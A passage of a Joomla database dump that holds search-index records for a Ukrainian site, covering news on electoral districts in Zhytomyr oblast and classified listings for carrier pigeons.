list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:57:\"2469:v-zhitomirskij-oblasti-utvoreno-8-viborchikh-okrugiv\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:79:\"/index.php/8-novini-2/2469-v-zhitomirskij-oblasti-utvoreno-8-viborchikh-okrugiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2469\";s:5:\"route\";s:110:\"index.php?option=com_content&view=article&id=2469:v-zhitomirskij-oblasti-utvoreno-8-viborchikh-okrugiv&catid=8\";s:5:\"title\";s:93:\"В Житомирській області утворено 8 виборчих округів\";s:11:\"description\";s:1844:\" В Житомирській області утворено 8 виборчих округів, відповідну постанову прийняла обласна виборча комісія 5 вересня 2020 року. Зокрема: Округ № 1 – Житомирська ОТГ Богунський район, орієнтована кількість виборців – 116 418 Округ №2 – Житомирська ОТГ Корольовський район, с. Вереси, орієнтована кількість виборців – 92 078 Округ №3 – Радомишльська міська рада та 7 селищних та 8 сільських ОТГ, орієнтована кількість виборців – 131 204 Округ №4 – Чуднівська та Коростишівська міські ради і 5 селищних та 7 сільських ОТГ, орієнтована кількість виборців – 143 444 Округ №5 – Новоград-Волинська і Баранівська міські ради та 3 селищні і 7 сільських ОТГ, орієнтована кількість виборців – 130 654 Округ №6 – Коростенська, Олевська та Овруцькі міські ради та 2 селищні і 5 сільських ОТГ, орієнтована кількість виборців – 159 548 Округ №7 – Малинська міська рада та 2 селищні ОТГ, орієнтована кількість виборців – 42 059 Округ №8 – Бердичівська та Андрушівська міські ради та 3 селищні і 5 сільських ОТГ, орієнтована кількість виборців – 131 334 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-10 13:18:22\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-10 13:18:22\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4661,'index.php?option=com_content&view=article&id=2452','index.php?option=com_content&view=article&id=2452:golub-poshtovij-samka&catid=126','Голуб поштовий самка',' В наявності самка 2011 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмельник. По 150, телефонуйте, домовимось. Відео за посиланнями: https://www.youtube.com/watch?v=HjJWphPw8ZM ','2020-09-10 20:11:57','e27175f99aba0be418fa55cbfb6a4be6',1,1,1,'*','2020-08-30 14:48:33','0000-00-00 00:00:00','2020-08-30 14:48:33','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2452\";s:5:\"alias\";s:21:\"golub-poshtovij-samka\";s:7:\"summary\";s:1795:\"<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">В наявності самка 2011 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч,&nbsp;<!--StartFragment-->Хмельник.&nbsp;По 150, телефонуйте, домовимось.</p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">Відео за посиланнями:&nbsp;<a href=\"https://www.youtube.com/watch?v=HjJWphPw8ZM\"><!--StartFragment-->https://www.youtube.com/watch?v=HjJWphPw8ZM</a><!--EndFragment--></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gl_0026_960x640.jpg\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/gl_0026_960x640.jpg\"></a><br></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-10 17:11:57\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:26:\"2452:golub-poshtovij-samka\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:53:\"/index.php/holuby/poshtovi/2452-golub-poshtovij-samka\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2452\";s:5:\"route\";s:81:\"index.php?option=com_content&view=article&id=2452:golub-poshtovij-samka&catid=126\";s:5:\"title\";s:38:\"Голуб поштовий самка\";s:11:\"description\";s:346:\" В наявності самка 2011 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмельник. По 150, телефонуйте, домовимось. Відео за посиланнями: https://www.youtube.com/watch?v=HjJWphPw8ZM \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-08-30 14:48:33\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-08-30 14:48:33\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4664,'index.php?option=com_content&view=article&id=2470','index.php?option=com_content&view=article&id=2470:viborchi-okrugi-po-viborakh-do-malinskoji-miskoji-radi&catid=8','Виборчі округи по виборах до Малинської міської ради',' ','2020-09-12 16:47:51','0d9fd0447866389771795b8b3087e60d',1,1,1,'*','2020-09-12 13:47:51','0000-00-00 00:00:00','2020-09-12 13:47:51','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2470\";s:5:\"alias\";s:54:\"viborchi-okrugi-po-viborakh-do-malinskoji-miskoji-radi\";s:7:\"summary\";s:188:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/malyn_okrugi.jpg\"><img src=\"https://malehus.in.ua/images/stories/malyn_okrugi.jpg\" alt=\"\" class=\"fr-fin\" width=\"817\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-12 13:47:51\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:59:\"2470:viborchi-okrugi-po-viborakh-do-malinskoji-miskoji-radi\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:81:\"/index.php/8-novini-2/2470-viborchi-okrugi-po-viborakh-do-malinskoji-miskoji-radi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2470\";s:5:\"route\";s:112:\"index.php?option=com_content&view=article&id=2470:viborchi-okrugi-po-viborakh-do-malinskoji-miskoji-radi&catid=8\";s:5:\"title\";s:97:\"Виборчі округи по виборах до Малинської міської ради\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-12 13:47:51\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-12 13:47:51\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4669,'index.php?option=com_content&view=article&id=2467','index.php?option=com_content&view=article&id=2467:molodi-poshtovi-bili&catid=126','Молоді поштові білі',' В наявності 4 молодих білих 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Хмельник, Овруч. Ціна 120, телефонуйте, домовимось. Фото голубів можна переглянути за посиланням : https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-bili ','2020-09-14 21:07:15','2a5abd2bff3406a9e9708418fa56cb96',1,1,1,'*','2020-09-03 17:59:38','0000-00-00 00:00:00','2020-09-03 17:59:38','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2467\";s:5:\"alias\";s:20:\"molodi-poshtovi-bili\";s:7:\"summary\";s:1111:\"<!--StartFragment--><p><strong><em><span style=\"font-size: 14px;\">&nbsp;В наявності 4 молодих білих 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Хмельник,&nbsp; Овруч. Ціна 120, телефонуйте, домовимось. Фото голубів можна переглянути за посиланням</span></em></strong>:<a href=\"https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-bili\">https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-bili</a><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gpost_20200903_00080.jpg\"><img alt=\"\" class=\"fr-fin fr-dib\" src=\"https://malehus.in.ua/images/stories/gpost_20200903_00080.jpg\" width=\"776\"></a></p><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/QeTvD3S3oZE\" width=\"560\"></iframe></span></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-14 18:07:15\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1